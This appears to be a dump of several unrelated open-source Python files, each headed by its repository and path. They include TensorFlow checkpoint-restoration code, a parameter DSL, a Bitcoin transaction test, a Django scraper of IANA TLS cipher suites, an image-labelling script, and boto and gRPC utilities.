(restore_ops,
named_saveables,
python_saveables) = self._gather_ops_or_named_saveables()
# Eagerly run restorations for Python state.
reader = pywrap_tensorflow.NewCheckpointReader(
self._checkpoint.save_path_string)
for saveable in python_saveables:
spec_names = [spec.name for spec in saveable.specs]
saveable.python_restore(
[reader.get_tensor(name) for name in spec_names])
# If we have new SaveableObjects, extract and cache restore ops.
if named_saveables:
validated_saveables = (
self._checkpoint.builder._ValidateAndSliceInputs(named_saveables)) # pylint: disable=protected-access
validated_names = set(saveable.name for saveable in validated_saveables)
if set(named_saveables.keys()) != validated_names:
raise AssertionError(
("Saveable keys changed when validating. Got back %s, was "
"expecting %s") % (named_saveables.keys(), validated_names))
all_tensors = self._checkpoint.builder.bulk_restore(
filename_tensor=self._checkpoint.save_path_tensor,
saveables=validated_saveables, preferred_shard=-1,
restore_sequentially=False)
saveable_index = 0
for saveable in validated_saveables:
num_specs = len(saveable.specs)
saveable_tensors = all_tensors[
saveable_index:saveable_index + num_specs]
saveable_index += num_specs
restore_op = saveable.restore(saveable_tensors, restored_shapes=None)
if not context.executing_eagerly():
assert saveable.name not in self._checkpoint.restore_ops_by_name
self._checkpoint.restore_ops_by_name[saveable.name] = restore_op
restore_ops.append(restore_op)
return restore_ops
@property
def checkpoint(self):
return self._checkpoint
@property
def checkpointable(self):
return self._checkpoint.object_by_proto_id[self._proto_id]
@property
def object_proto(self):
return self._checkpoint.object_graph_proto.nodes[self._proto_id]
@property
def restore_uid(self):
return self._checkpoint.restore_uid
def __repr__(self):
return repr(self.object_proto)
_DeferredSlotVariableRestoration = collections.namedtuple(
"_DeferredSlotVariableRestoration",
[
"original_variable",
"slot_variable_id",
"slot_name",
]
)
_SlotVariableRestoration = collections.namedtuple(
"_SlotVariableRestoration",
[
# The checkpoint proto id of the optimizer object.
"optimizer_id",
# The checkpoint proto id of the slot variable.
"slot_variable_id",
"slot_name",
])
def no_automatic_dependency_tracking(method):
"""Disables automatic dependency tracking on attribute assignment.
Use to decorate any method of a Checkpointable object. Attribute assignment in
that method will not add dependencies (also respected in Model). Harmless if
used in a class which does not do automatic dependency tracking (which means
it's safe to use in base classes which may have subclasses which also inherit
from Checkpointable).
Args:
method: The method to decorate.
Returns:
A decorated method which sets and un-sets automatic dependency tracking for
the object the method is called on (not thread safe).
"""
def _method_wrapper(self, *args, **kwargs):
previous_value = getattr(self, "_setattr_tracking", True)
self._setattr_tracking = False # pylint: disable=protected-access
try:
method(self, *args, **kwargs)
finally:
self._setattr_tracking = previous_value # pylint: disable=protected-access
return tf_decorator.make_decorator(
target=method, decorator_func=_method_wrapper)
class CheckpointableBase(object):
"""Base class for `Checkpointable` objects without automatic dependencies.
This class has no __setattr__ override for performance reasons. Dependencies
must be added explicitly. Unless attribute assignment is performance-critical,
use `Checkpointable` instead. Use `CheckpointableBase` for `isinstance`
checks.
"""
# CheckpointableBase does not do automatic dependency tracking, but uses the
# no_automatic_dependency_tracking decorator so it can avoid adding
# dependencies if a subclass is Checkpointable / inherits from Model (both of
# which have __setattr__ overrides).
@no_automatic_dependency_tracking
def _maybe_initialize_checkpointable(self):
"""Initialize dependency management.
Not __init__, since most objects will forget to call it.
"""
if hasattr(self, "_unconditional_checkpoint_dependencies"):
# __init__ already called. This check means that we don't need
# Checkpointable.__init__() in the constructor of every TensorFlow object.
return
# A list of CheckpointableReference objects. Some classes implementing
# `Checkpointable`, notably `Optimizer`s, may override the
# _checkpoint_dependencies property with conditional dependencies
# (e.g. based on the current graph when saving).
self._unconditional_checkpoint_dependencies = []
# Maps names -> Checkpointable objects
self._unconditional_dependency_names = {}
# Restorations for other Checkpointable objects on which this object may
# eventually depend. Maps local name -> _CheckpointPosition list. Optimizers
# tack on conditional dependencies, and so need separate management of
# deferred dependencies too.
self._unconditional_deferred_dependencies = {}
# The UID of the highest assignment to this object. Used to ensure that the
# last requested assignment determines the final value of an object.
if hasattr(self, "_update_uid"):
raise AssertionError(
"Internal error: the object had an update UID set before its "
"initialization code was run.")
self._update_uid = -1
# When executing eagerly, holds a collection of _NameBasedRestoreCoordinator
# instances, which should be checked when creating variables or other
# saveables. These are passed on recursively to all dependencies, since
# unlike object-based checkpoint restores we don't know which subgraph is
# being restored in advance. This mechanism is only necessary for
# restore-on-create when executing eagerly, and so is unused when graph
# building.
self._name_based_restores = set()
def _no_dependency(self, value):
"""If automatic dependency tracking is enabled, ignores `value`."""
return value
def _name_based_attribute_restore(self, checkpoint):
"""Restore the object's attributes from a name-based checkpoint."""
self._name_based_restores.add(checkpoint)
if self._update_uid < checkpoint.restore_uid:
checkpoint.eager_restore(self)
self._update_uid = checkpoint.restore_uid
@property
def _checkpoint_dependencies(self):
"""All dependencies of this object.
May be overridden to include conditional dependencies.
Returns:
A list of `CheckpointableReference` objects indicating named
`Checkpointable` dependencies which should be saved along with this
object.
"""
return self._unconditional_checkpoint_dependencies
@property
def _deferred_dependencies(self):
"""A dictionary with deferred dependencies.
Stores restorations for other Checkpointable objects on which this object
may eventually depend. May be overridden by sub-classes (e.g. Optimizers use
conditional dependencies based the current graph, and so need separate
management of deferred dependencies too).
Returns:
A dictionary mapping from local name to a list of _CheckpointPosition
objects.
"""
return self._unconditional_deferred_dependencies
def _lookup_dependency(self, name):
"""Look up a dependency by name.
May be overridden to include conditional dependencies.
Args:
name: The local name of the dependency.
Returns:
A `Checkpointable` object, or `None` if no dependency by this name was
found.
"""
return self._unconditional_dependency_names.get(name, None)
def _add_variable_with_custom_getter(
self, name, shape=None, dtype=dtypes.float32,
initializer=None, getter=None, overwrite=False,
**kwargs_for_getter):
"""Restore-on-create for a variable be saved with this `Checkpointable`.
If the user has requested that this object or another `Checkpointable` which
depends on this object be restored from a checkpoint (deferred loading
before variable object creation), `initializer` may be ignored and the value
from the checkpoint used instead.
Args:
name: A name for the variable. Must be unique within this object.
shape: The shape of the variable.
dtype: The data type of the variable.
initializer: The initializer to use. Ignored if there is a deferred
restoration left over from a call to
`_restore_from_checkpoint_position`.
getter: The getter to wrap which actually fetches the variable.
overwrite: If True, disables unique name and type checks.
**kwargs_for_getter: Passed to the getter.
Returns:
The new variable object.
Raises:
ValueError: If the variable name is not unique.
"""
self._maybe_initialize_checkpointable()
with ops.init_scope():
if context.executing_eagerly():
# If this is a variable with a single Tensor stored in the checkpoint,
# we can set that value as an initializer rather than initializing and
# then assigning (when executing eagerly). This call returns None if
# there is nothing to restore.
checkpoint_initializer = self._preload_simple_restoration(
name=name, shape=shape)
else:
checkpoint_initializer = None
if (checkpoint_initializer is not None
and not (
isinstance(initializer, CheckpointInitialValue)
and (initializer.restore_uid
> checkpoint_initializer.restore_uid))):
# If multiple Checkpointable objects are "creating" the same variable
# via the magic of custom getters, the one with the highest restore UID
# (the one called last) has to make the final initializer. If another
# custom getter interrupts this process by overwriting the initializer,
# then we'll catch that when we call _track_checkpointable. So this is
# "best effort" to set the initializer with the highest restore UID.
initializer = checkpoint_initializer
shape = None
new_variable = getter(
name=name, shape=shape, dtype=dtype, initializer=initializer,
**kwargs_for_getter)
# If we set an initializer and the variable processed it, tracking will not
# assign again. It will add this variable to our dependencies, and if there
# is a non-trivial restoration queued, it will handle that. This also
# handles slot variables.
if not overwrite or isinstance(new_variable, CheckpointableBase):
return self._track_checkpointable(new_variable, name=name,
overwrite=overwrite)
else:
# TODO(allenl): Some variable types are not yet supported. Remove this
# fallback once all get_variable() return types are Checkpointable.
return new_variable
def _preload_simple_restoration(self, name, shape):
"""Return a dependency's value for restore-on-create.
Note the restoration is not deleted; if for some reason preload is called
and then not assigned to the variable (for example because a custom getter
overrides the initializer), the assignment will still happen once the
variable is tracked (determined based on checkpoint.restore_uid).
Args:
name: The object-local name of the dependency holding the variable's
value.
shape: The shape of the variable being loaded into.
Returns:
An callable for use as a variable's initializer/initial_value, or None if
one should not be set (either because there was no variable with this name
in the checkpoint or because it needs more complex deserialization). Any
non-trivial deserialization will happen when the variable object is
tracked.
"""
deferred_dependencies_list = self._deferred_dependencies.get(name, ())
if not deferred_dependencies_list:
# Nothing to do; we don't have a restore for this dependency queued up.
return
for checkpoint_position in deferred_dependencies_list:
if not checkpoint_position.is_simple_variable():
# If _any_ pending restoration is too complicated to fit in an
# initializer (because it has dependencies, or because there are
# multiple Tensors to restore), bail and let the general tracking code
# handle it.
return None
checkpoint_position = max(
deferred_dependencies_list,
key=lambda restore: restore.checkpoint.restore_uid)
return CheckpointInitialValue(
checkpoint_position=checkpoint_position, shape=shape)
def _track_checkpointable(self, checkpointable, name, overwrite=False):
"""Declare a dependency on another `Checkpointable` object.
Indicates that checkpoints for this object should include variables from
`checkpointable`.
Variables in a checkpoint are mapped to `Checkpointable`s based on the names
provided when the checkpoint was written. To avoid breaking existing
checkpoints when modifying a class, neither variable names nor dependency
names (the names passed to `_track_checkpointable`) may change.
Args:
checkpointable: A `Checkpointable` which this object depends on.
name: A local name for `checkpointable`, used for loading checkpoints into
the correct objects.
overwrite: Boolean, whether silently replacing dependencies is OK. Used
for __setattr__, where throwing an error on attribute reassignment would
be inappropriate.
Returns:
`checkpointable`, for convenience when declaring a dependency and
assigning to a member variable in one statement.
Raises:
TypeError: If `checkpointable` does not inherit from `Checkpointable`.
ValueError: If another object is already tracked by this name.
"""
self._maybe_initialize_checkpointable()
if not isinstance(checkpointable, CheckpointableBase):
raise TypeError(
("Checkpointable._track_checkpointable() passed type %s, not a "
"Checkpointable.") % (type(checkpointable),))
new_reference = CheckpointableReference(name=name, ref=checkpointable)
current_object = self._lookup_dependency(name)
if (current_object is not None
and current_object is not checkpointable):
if not overwrite:
raise ValueError(
("Called Checkpointable._track_checkpointable() with name='%s', "
"but a Checkpointable with this name is already declared as a "
"dependency. Names must be unique (or overwrite=True).") % (name,))
# This is a weird thing to do, but we're not going to stop people from
# using __setattr__.
for index, (old_name, _) in enumerate(
self._unconditional_checkpoint_dependencies):
if name == old_name:
self._unconditional_checkpoint_dependencies[index] = new_reference
elif current_object is None:
self._unconditional_checkpoint_dependencies.append(new_reference)
self._handle_deferred_dependencies(
name=name, checkpointable=checkpointable)
self._unconditional_dependency_names[name] = checkpointable
return checkpointable
def _handle_deferred_dependencies(self, name, checkpointable):
"""Pop and load any deferred checkpoint restores into `checkpointable`.
This method does not add a new dependency on `checkpointable`, but it does
check if any outstanding/deferred dependencies have been queued waiting for
this dependency to be added (matched based on `name`). If so,
`checkpointable` and its dependencies are restored. The restorations are
considered fulfilled and so are deleted.
`_track_checkpointable` is more appropriate for adding a
normal/unconditional dependency, and includes handling for deferred
restorations. This method allows objects such as `Optimizer` to use the same
restoration logic while managing conditional dependencies themselves, by
overriding `_checkpoint_dependencies` and `_lookup_dependency` to change the
object's dependencies based on the context it is saved/restored in (a single
optimizer instance can have state associated with multiple graphs).
Args:
name: The name of the dependency within this object (`self`), used to
match `checkpointable` with values saved in a checkpoint.
checkpointable: The Checkpointable object to restore (inheriting from
`CheckpointableBase`).
"""
self._maybe_initialize_checkpointable()
checkpointable._maybe_initialize_checkpointable() # pylint: disable=protected-access
deferred_dependencies_list = self._deferred_dependencies.pop(name, ())
for checkpoint_position in sorted(
deferred_dependencies_list,
key=lambda restore: restore.checkpoint.restore_uid,
reverse=True):
checkpoint_position.restore(checkpointable)
# Pass on any name-based restores queued in this object.
for name_based_restore in sorted(
self._name_based_restores,
key=lambda checkpoint: checkpoint.restore_uid,
reverse=True):
checkpointable._name_based_attribute_restore(name_based_restore) # pylint: disable=protected-access
def _restore_from_checkpoint_position(self, checkpoint_position):
"""Restore this object and its dependencies (may be deferred)."""
# Attempt a breadth-first traversal, since presumably the user has more
# control over shorter paths. If we don't have all of the dependencies at
# this point, the end result is not breadth-first (since other deferred
# traversals will happen later).
visit_queue = collections.deque([checkpoint_position])
restore_ops = []
while visit_queue:
current_position = visit_queue.popleft()
restore_ops.extend(nest.flatten(
current_position.checkpointable # pylint: disable=protected-access
._single_restoration_from_checkpoint_position(
checkpoint_position=current_position,
visit_queue=visit_queue)))
return restore_ops
def _single_restoration_from_checkpoint_position(
self, checkpoint_position, visit_queue):
"""Restore this object, and either queue its dependencies or defer them."""
self._maybe_initialize_checkpointable()
checkpoint = checkpoint_position.checkpoint
# If the UID of this restore is lower than our current update UID, we don't
# need to actually restore the object. However, we should pass the
# restoration on to our dependencies.
if checkpoint.restore_uid > self._update_uid:
restore_ops = checkpoint_position.restore_ops()
self._update_uid = checkpoint.restore_uid
else:
restore_ops = ()
for child in checkpoint_position.object_proto.children:
child_position = _CheckpointPosition(
checkpoint=checkpoint,
proto_id=child.node_id)
local_object = self._lookup_dependency(child.local_name)
if local_object is None:
# We don't yet have a dependency registered with this name. Save it
# in case we do.
self._deferred_dependencies.setdefault(child.local_name, []).append(
child_position)
else:
if child_position.bind_object(checkpointable=local_object):
# This object's correspondence is new, so dependencies need to be
# visited. Delay doing it so that we get a breadth-first dependency
# resolution order (shallowest paths first). The caller is responsible
# for emptying visit_queue.
visit_queue.append(child_position)
return restore_ops
def _gather_saveables_for_checkpoint(self):
"""Returns a dictionary of values to checkpoint with this object.
Keys in the returned dictionary are local to this object and in a separate
namespace from dependencies. Values may either be `SaveableObject` factories
or variables easily converted to `SaveableObject`s (as in `tf.train.Saver`'s
`var_list` constructor argument).
`SaveableObjects` have a name set, which Checkpointable needs to generate
itself. So rather than returning `SaveableObjects` directly, this method
should return a dictionary of callables which take `name` arguments and
return `SaveableObjects` with that name.
If this object may also be passed to the global-name-based `tf.train.Saver`,
the returned callables should have a default value for their name argument
(i.e. be callable with no arguments).
Returned values must be saved only by this object; if any value may be
shared, it should instead be a dependency. For example, variable objects
save their own values with the key `VARIABLE_VALUE_KEY`, but objects which
reference variables simply add a dependency.
Returns:
The dictionary mapping attribute names to `SaveableObject` factories
described above. For example:
{VARIABLE_VALUE_KEY:
lambda name="global_name_for_this_object":
SaveableObject(name=name, ...)}
"""
if not hasattr(self, "get_config"):
return {}
try:
self.get_config()
except NotImplementedError:
return {}
weak_self = weakref.ref(self)
def _state_callback():
dereferenced_self = weak_self()
if dereferenced_self:
return json.dumps(dereferenced_self,
default=serialization.get_json_type,
sort_keys=True).encode("utf8")
else:
return ""
return {OBJECT_CONFIG_JSON_KEY: functools.partial(
PythonStringStateSaveable,
state_callback=_state_callback)}
|
benoitsteiner/tensorflow-xsmm
|
refs/heads/master
|
tensorflow/contrib/specs/python/params_ops.py
|
186
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operators for concise TensorFlow parameter specifications.
This module is used as an environment for evaluating expressions
in the "params" DSL.
Specifications are intended to assign simple numerical
values. Examples:
--params "n=64; d=5" --spec "(Cr(n) | Mp([2, 2])) ** d | Fm"
The random parameter primitives are useful for running large numbers
of experiments with randomly distributed parameters:
--params "n=Li(5,500); d=Ui(1,5)" --spec "(Cr(n) | Mp([2, 2])) ** d | Fm"
Internally, this might be implemented as follows:
params = specs.create_params(FLAGS.params, {})
logging.info(repr(params))
net = specs.create_net(FLAGS.spec, inputs, params)
Note that separating the specifications into parameters and network
creation allows us to log the random parameter values easily.
The implementation of this will change soon in order to support
hyperparameter tuning with steering. Instead of returning a number,
the primitives below will return a class instance that is then
used to generate a random number by the framework.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Lint disabled because these are operators in the DSL, not regular
# Python functions.
# pylint: disable=invalid-name
# pylint: disable=wildcard-import,unused-wildcard-import,redefining-builtin
# pylint: disable=redefined-builtin,g-importing-member,no-member
# make available all math expressions
import math
from math import *
import random
# pylint: enable=wildcard-import,unused-wildcard-import,redefining-builtin
# pylint: enable=redefined-builtin,g-importing-member,no-member
def Uf(lo=0.0, hi=1.0):
"""Uniformly distributed floating number."""
return random.uniform(lo, hi)
def Ui(lo, hi):
"""Uniformly distributed integer, inclusive limits."""
return random.randint(lo, hi)
def Lf(lo, hi):
"""Log-uniform distributed floatint point number."""
return math.exp(random.uniform(math.log(lo), math.log(hi)))
def Li(lo, hi):
"""Log-uniform distributed integer, inclusive limits."""
return int(math.floor(math.exp(random.uniform(math.log(lo),
math.log(hi+1-1e-5)))))
def Nt(mu, sigma, limit=3.0):
"""Normally distributed floating point number with truncation."""
return min(max(random.gauss(mu, sigma), mu-limit*sigma), mu+limit*sigma)
# pylint: enable=invalid-name
|
Dirbaio/btcmagic
|
refs/heads/master
|
btcmagic/test_transaction.py
|
1
|
from unittest import TestCase
from btcmagic import transaction, convert
import os
import json
class TestTransaction(TestCase):
def setUp(self):
self.tx_bin = convert.hex_to_bytes(
'0100000001637aaf20d708fcff67bb688af6e41d1807e6883f736c50eacb6042bf6e6c829c010000008c493046022100da1e59d78bb88ca7c3e13a4a6f4e259d5dd8cb177d5f79199bf024b1f57121d50221008d1d9838606a62ed4bd011a6ce8a2042ae2dc38fd05381b50aa388a1c8bd9150014104d3b615c609e48ae81389f6617b50473bf4c93f63c9853cd038aa4f00a989ebd62ae8253555e24c88b939817da18cd4e7263fda6a0e815097589bb90a5a6b3ff1ffffffff03b9000000000000001976a9149fe14d50c95abd6ecddc5d61255cfe5aebeba7e988ac57300f00000000001976a914c0492db5f283a22274ef378cdffbe5ecbe29862b88ac00000000000000000a6a0810e2cdc1af05180100000000')
self.tx_obj = {
'ins': [
{
'sequence': 4294967295,
'script': b'I0F\x02!\x00\xda\x1eY\xd7\x8b\xb8\x8c\xa7\xc3\xe1:JoN%\x9d]\xd8\xcb\x17}_y\x19\x9b\xf0$\xb1\xf5q!\xd5\x02!\x00\x8d\x1d\x988`jb\xedK\xd0\x11\xa6\xce\x8a B\xae-\xc3\x8f\xd0S\x81\xb5\n\xa3\x88\xa1\xc8\xbd\x91P\x01A\x04\xd3\xb6\x15\xc6\t\xe4\x8a\xe8\x13\x89\xf6a{PG;\xf4\xc9?c\xc9\x85<\xd08\xaaO\x00\xa9\x89\xeb\xd6*\xe8%5U\xe2L\x88\xb99\x81}\xa1\x8c\xd4\xe7&?\xdaj\x0e\x81P\x97X\x9b\xb9\nZk?\xf1',
'outpoint': {'index': 1, 'hash': b'\x9c\x82ln\xbfB`\xcb\xeaPls?\x88\xe6\x07\x18\x1d\xe4\xf6\x8ah\xbbg\xff\xfc\x08\xd7 \xafzc'}
}
],
'locktime': 0,
'version': 1,
'outs': [
{
'value': 185,
'script': b'v\xa9\x14\x9f\xe1MP\xc9Z\xbdn\xcd\xdc]a%\\\xfeZ\xeb\xeb\xa7\xe9\x88\xac'
},
{
'value': 995415,
'script': b'v\xa9\x14\xc0I-\xb5\xf2\x83\xa2"t\xef7\x8c\xdf\xfb\xe5\xec\xbe)\x86+\x88\xac'
},
{
'value': 0,
'script': b'j\x08\x10\xe2\xcd\xc1\xaf\x05\x18\x01'
}
]
}
def test_deserialization(self):
tx_obj = transaction.deserialize(self.tx_bin)
self.assertEqual(tx_obj, self.tx_obj)
def test_serialization(self):
tx_bin = transaction.serialize(self.tx_obj)
self.assertEqual(tx_bin, self.tx_bin)
class TestSighash(TestCase):
def setUp(self):
loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with open(os.path.join(loc, 'sighash.json')) as f:
self.data = json.load(f)
def test_sighash(self):
first = True
for vector in self.data:
# Ignore first header row in the JSON.
if first:
first = False
continue
tx = transaction.deserialize(convert.hex_to_bytes(vector[0]))
script = convert.hex_to_bytes(vector[1])
index = int(vector[2])
hashtype = int(vector[3]) & 0xffffffff # This must be unsigned int
sighash = convert.hex_to_bytes(vector[4])[::-1] # It's reversed for some reason?
my_sighash = transaction.sighash(tx, index, script, hashtype)
self.assertEqual(
sighash,
my_sighash,
'hashtype = {:x}'.format(hashtype)
)
|
hcrudolph/ciphersuite.info
|
refs/heads/master
|
directory/management/commands/scrapeiana.py
|
1
|
from django.core.management.base import BaseCommand, CommandError
from directory.models import CipherSuite, Rfc
from os import linesep
from requests import get
import re
class FailedDownloadException(Exception):
pass
class Command(BaseCommand):
help = 'Scrapes TLS cipher suites from iana.org'
# definition of generic filters for TLS ciphers
# only fieldnames that contain (re.search) a
# given regex will be added to the database
# format: (fieldname, regex)
def __init__(self):
self.positive_filters = [
('name', 'Unassigned'),
('name', 'Reserved'),
('name', 'EMPTY'),
('name', 'FALLBACK'),
]
self.negative_filters = [
('name', 'TLS'),
]
# inherit everything else from BaseCommand
super().__init__()
def get_csv(self, url='https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv'):
"""Tries to download the content at the specified URL,
returning the response in plain text format. If status code
equals anything else than 200, FailedDownloadException is thrown"""
response = get(url)
if response.status_code == 200:
return response.text
else:
raise FailedDownloadException()
def split_line(self, line):
result = dict()
info = line.split(',')
result['hex1'] = re.search(r'0x[0-9A-F]{2}', info[0]).group(0)
result['hex2'] = re.search(r'0x[0-9A-F]{2}', info[1]).group(0)
result['name'] = info[2]
# info[3] = DTLS-OK
# info[4] = Recommended
result['rfcs'] = re.search(r'\[(RFC\d+)\]', info[5]).groups()
return result
def handle(self, *args, **options):
"""Main function to be run when command is executed."""
verbosity = int(options['verbosity'])
# try downloading csv file
try:
csv_file = self.get_csv()
except:
raise CommandError("Failed to download resource from the given URL.")
# counter for successfully inserted or found ciphers
cs_new = cs_old = rfc_new = 0
for line in csv_file.split(linesep):
# try splitting line its separate components or skip it
try:
d = self.split_line(line)
except:
if verbosity > 1:
self.stdout.write(
self.style.NOTICE("Failed to split line. Skipping.")
)
continue
# if any filters don't match, skip current cipher suite
if not all(re.search(f[1], d[f[0]], re.IGNORECASE) for f in self.negative_filters):
if verbosity > 1:
self.stdout.write(
self.style.NOTICE("Failed to parse line. Skipping.")
)
continue
# if any filters do match, skip current cipher suite
if any(re.search(f[1], d[f[0]]) for f in self.positive_filters):
if verbosity > 1:
self.stdout.write(
self.style.NOTICE("Failed to parse line. Skipping.")
)
continue
# create model instances in DB
c, cstat = CipherSuite.objects.get_or_create(
name = d['name'],
hex_byte_1 = d['hex1'],
hex_byte_2 = d['hex2'],
)
for rfc in d['rfcs']:
regular_rfc = re.match(r'RFC(\d+)', rfc)
draft_rfc = re.match(r'RFC-ietf-tls-rfc(\d+).+', rfc)
if regular_rfc is not None:
rfc_nr = regular_rfc.group(1)
draft_status = False
elif draft_rfc is not None:
rfc_nr = draft_rfc.group(1)
draft_status = True
r, rstat = Rfc.objects.get_or_create(
number = rfc_nr,
is_draft = draft_status
)
c.defining_rfcs.add(r)
if rstat:
rfc_new += 1
if verbosity > 2:
self.stdout.write(
self.style.SUCCESS(
f"Successfully created RFC '{r.number}'."
)
)
if cstat:
cs_new += 1
if verbosity > 2:
self.stdout.write(
self.style.SUCCESS(
f"Successfully created Ciphersuite '{c.name}'."
)
)
else:
cs_old += 1
self.stdout.write(
self.style.SUCCESS(
f"Successfully created {cs_new} ({cs_old}) cipher suites and {rfc_new} RFCs."
)
)
|
buckbaskin/stopsign
|
refs/heads/master
|
src/v1/group_by_image.py
|
1
|
#!/usr/bin/env python
import rospkg
import cv2
import datetime
import gc
import joblib
import numpy as np
import pandas as pd
from imblearn.under_sampling import RandomUnderSampler
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
rospack = rospkg.RosPack()
pkg_path = rospack.get_path('stopsign')
BULK_DATA_FILE = '%s/data/003_manual_labels/all.csv' % (pkg_path,)
IMAGE_DATA_FILE = '%s/data/005_image_labels/all.csv' % (pkg_path,)
KP_MODEL_STORE_FILE = '%s/data/005_image_labels/kp_classifier.pkl' % (pkg_path,)
start_image_id = 0
end_image_id = 2189
NUM_IMAGES = end_image_id - start_image_id
NUM_ORBS_FEATURES = 500
labels = ['class']
for i in range(0, 32):
labels.append('descr%02d' % (i,))
labels.extend(['angle', 'classid', 'octave', 'x', 'y', 'response', 'size','imageid'])
new_labels = ['class']
for i in range(0, 500):
labels.append('orbkp%03d' % i)
def transfer(read_file, write_file):
print('time 0 sec')
start_time = datetime.datetime.now()
kp_classifier = joblib.load(KP_MODEL_STORE_FILE)
write_file.write(','.join(labels) + '\n')
first_line = True
imageid = 0
kp_id = 0
image_has_stopsign = False
writeline = [None] * 501
output_batch = []
for line in read_file:
if first_line:
first_line = False
continue
values = [float(x.strip()) for x in line.split(',')]
values[labels.index('class')] /= 1000.0
values[labels.index('angle')] /= 1000.0
values[labels.index('response')] /= 100000000.0
read_image_id = values[labels.index('imageid')]
# print('read %d vs imgid %d' % (read_image_id, imageid,))
if read_image_id == imageid:
X = np.array(values[1:33]).reshape(1, -1)
y_pred = kp_classifier.predict(X)[0]
image_has_stopsign = image_has_stopsign or y_pred > 0.5
writeline[kp_id + 1] = '%.3f' % float(y_pred)
if kp_id >= 499:
kp_id = 498
kp_id += 1
elif read_image_id - imageid == 1:
assert kp_id == 499
img_class = image_has_stopsign
writeline[0] = str(int(img_class))
output_batch.append(','.join(writeline) + '\n')
if imageid % 20 == 0:
print('Batching image %4d / %4d @ %.2f sec total %.2f sec per' % (
imageid + 1,
end_image_id,
(datetime.datetime.now() - start_time).total_seconds(),
(datetime.datetime.now() - start_time).total_seconds() / (imageid+1),))
imageid += 1
kp_id = 0
image_has_stopsign = False
else:
raise ValueError('Unexpected value for imageid %d from %d' % (read_image_id, imageid))
if len(output_batch) > 100:
write_file.write(''.join(output_batch))
print('write batch 100 %.2f sec total %.2f sec per' % (
(datetime.datetime.now() - start_time).total_seconds(),
(datetime.datetime.now() - start_time).total_seconds() / (imageid+1)))
output_batch = []
if __name__ == '__main__':
### Begin the whole process ###
with open(BULK_DATA_FILE, 'r') as kp_f:
with open(IMAGE_DATA_FILE, 'w') as im_f:
transfer(kp_f, im_f)
|
boomsbloom/dtm-fmri
|
refs/heads/master
|
DTM/for_gensim/lib/python2.7/site-packages/boto/kinesis/__init__.py
|
22
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo, get_regions
from boto.regioninfo import connect
def regions():
"""
Get all available regions for the Amazon Kinesis service.
:rtype: list
:return: A list of :class:`boto.regioninfo.RegionInfo`
"""
from boto.kinesis.layer1 import KinesisConnection
return get_regions('kinesis', connection_cls=KinesisConnection)
def connect_to_region(region_name, **kw_params):
from boto.kinesis.layer1 import KinesisConnection
return connect('kinesis', region_name,
connection_cls=KinesisConnection, **kw_params)
|
ctiller/grpc
|
refs/heads/master
|
tools/run_tests/performance/massage_qps_stats.py
|
25
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Autogenerated by tools/codegen/core/gen_stats_data.py
import massage_qps_stats_helpers
def massage_qps_stats(scenario_result):
for stats in scenario_result["serverStats"] + scenario_result["clientStats"]:
if "coreStats" in stats:
# Get rid of the "coreStats" element and replace it by statistics
# that correspond to columns in the bigquery schema.
core_stats = stats["coreStats"]
del stats["coreStats"]
stats[
"core_client_calls_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_calls_created")
stats[
"core_server_calls_created"] = massage_qps_stats_helpers.counter(
core_stats, "server_calls_created")
stats["core_cqs_created"] = massage_qps_stats_helpers.counter(
core_stats, "cqs_created")
stats[
"core_client_channels_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_channels_created")
stats[
"core_client_subchannels_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_subchannels_created")
stats[
"core_server_channels_created"] = massage_qps_stats_helpers.counter(
core_stats, "server_channels_created")
stats["core_syscall_poll"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_poll")
stats["core_syscall_wait"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_wait")
stats["core_pollset_kick"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick")
stats[
"core_pollset_kicked_without_poller"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kicked_without_poller")
stats[
"core_pollset_kicked_again"] = massage_qps_stats_helpers.counter(
